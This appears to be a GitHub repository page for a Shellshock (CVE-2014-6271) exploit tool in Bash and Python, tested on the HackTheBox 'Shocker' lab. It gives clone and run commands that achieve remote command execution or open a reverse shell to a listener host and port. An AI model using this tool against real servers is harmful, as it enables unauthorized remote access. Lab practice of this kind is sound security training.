Gurguii / cgi-bin-shellshock

[Python/Shell] - Tested in HackTheBox - Shocker (Easy) CVE-2014-6271

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

How to use

Clone the repository (or just copy-paste the one you prefer)

  sudo git clone https://github.com/Gurguii/shellshock.sh

Run the script

  • Bash
    bash shellshock.sh -u <url> -h* <lhost> -p* <lport>
  • Python
    python3 shellshock.py -u <url> -lh* <lhost> -lp* <lport>

Note: default LPORT is 4444, URL required. If just URL given, it will RCE, else it will RSHELL to given lhost and lport

About

[Python/Shell] - Tested in HackTheBox - Shocker (Easy) CVE-2014-6271


Languages

Language:Python 58.7%Language:Shell 41.3%